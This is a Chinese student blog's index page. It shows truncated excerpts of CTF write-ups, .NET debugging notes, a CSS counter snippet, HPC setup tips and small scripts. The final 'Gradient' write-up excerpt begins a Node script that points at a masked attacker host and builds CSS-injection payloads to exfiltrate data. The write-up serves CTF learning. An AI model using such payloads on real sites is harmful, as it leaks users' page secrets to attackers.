5dbwat4's Blog

发表于 更新于
拿到468分,取得493名的垫底成绩。
Flag L3ak 1 2 3 4 5 6 7 8 9 10 const matchingPosts = posts .filter(post => post.title.includes(query) || post.content.includes(query) || post.author.includes(query) ) .map(post => ({ ...post, content: post.content.replace(FLAG, '...
阅读全文 »

发表于 更新于
RT,打CTF经常遇到C#或.NET应用,这里主要记录一下调试和运行的方案,适用于完全没有相关基础的情况。
逆向 可以用ILSPY 个人使用体验不错 运行 用dotNET SDK 下载:下载 .NET (Linux、macOS 和 Windows) | .NET 然后很坑的是不同的应用可能用的版本可能是不同的,比如L3HCTF的一道dotNET题用的就是6.0,然后更新版本直接把BinaryFormater删了 下载旧版本可以直接在原来页面后面加版本号。下载 .NET 6.0 (Linux、macOS 和 Windows) | .NET 然后就能跑C#应用了 dotnet --list-sdks查看已安装的 SDK ...
阅读全文 »

发表于 更新于

TL; DR

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
body{
  counter-reset: h1;
}
h1 {
  counter-reset: h2;
}
h2 {
  counter-reset: h3;
}
h3 {
  counter-reset: h4;
}
h4 {
  counter-reset: h5;
}
h5 {
  counter-reset: h6;
}
h1:before {
  counter-increment: h1;
  content: counter(h1);
  margin-right: 0.8rem;
}
h2:before {
  counter-increment: h2;
  content: counter(h1) "." counter(h2);
  margin-right: 0.8rem;
}
h3:before {
  counter-increment: h3;
  content: counter(h1) "." counter(h2) "." counter(h3);
  margin-right: 0.8rem;
}
h4:before {
  counter-increment: h4;
  content: counter(h1) "." counter(h2) "." counter(h3) "." counter(h4);
  margin-right: 0.8rem;
}
h5:before {
  counter-increment: h5;
  content: counter(h1) "." counter(h2) "." counter(h3) "." counter(h4) "." counter(h5);
  margin-right: 0.8rem;
}
h6:before {
  counter-increment: h6;
  content: counter(h1) "." counter(h2) "." counter(h3) "." counter(h4) "." counter(h5) "." counter(h6);
  margin-right: 0.8rem;
}
阅读全文 »

发表于 更新于
简单的说,就是在没有sudo的情况下,一些配置如何退而求其次。
先说一下HPC101给的节点的状况: 没有sudo(很显然) 预装的软件包不多(SadServers都知道装一个asciinema你居然没有) oh-my-zsh 配置 直接sh -c "...
阅读全文 »

发表于 更新于
哥们菜是真菜
在本次CTF中主要起到一个完成签到题的作用。 智械:双重牢笼 AI题 到结束的时候已经不到100pts了 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89...
阅读全文 »

发表于 更新于
为了抢到CC98首发,造了一个小玩具把学在浙大distribution接口返回的json生肉转成熟肉
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 const data = require("./distribution.json") let op = ""; data.subjects.sort((a,b)=>a.id-b.id).forEach((item) => { op+="#"+item.id+" 难度:"+item.difficulty_level+"\n&quo...
阅读全文 »

发表于 更新于
在本次Project中,你将欣赏到包括但不限于:
没有人知道它为什么在这里 1 2 3 %Error: /mnt/e/Projects/sys1-sp25-master/src/project/submit/RegFile.sv:18:11: syntax error, unexpected '[', expecting IDENTIFIER or randomize 18 | register[0] = 0; | ^ AI对enum的内容进行了原创性指导 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21...
阅读全文 »

发表于 更新于

Web Secret Config 女娲补胎 Emergency rickroll EzWebAuthn SmartGrader Gradient realLibraryManager Pwn GuessMaster Reverse AreYouReady NoisyCat SnakeSnakeSnake Expr-Warmup NoisyCat2 Crypto ezCrypt Notes AnatahEtodokuSakebi KillerECC Misc deleted Inaudible TIME&POWER Welcom3【来这里签到】 IP Hunter 24_flag1 IP Hun...
阅读全文 »

发表于 更新于
观前提示:本Writeup含有过量Deepseek The Flag的内容,建议谨慎观看
SmartGrader 来试试我写的分数换算小工具吧! 评价:又是JS抽象时刻 先上jd-gui逆呗 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 package BO...
阅读全文 »

发表于 更新于
观前提示:本Writeup含有过量Deepseek The Flag的内容,建议谨慎观看
Gradient 快来挑选你喜欢的渐变色吧! 原题,秒了:[Web Exploitation] Exfiltration via CSS Injection | tripoloski blog 你怎么知道我赛前刚读过这篇文章。 1 2 3 4 5 6 7 8 9 10 11 12 13 const host="http://*.*.*.*:*"; const fs=require("fs") let cs = " red,red);}" for(let i=0...
阅读全文 »
0%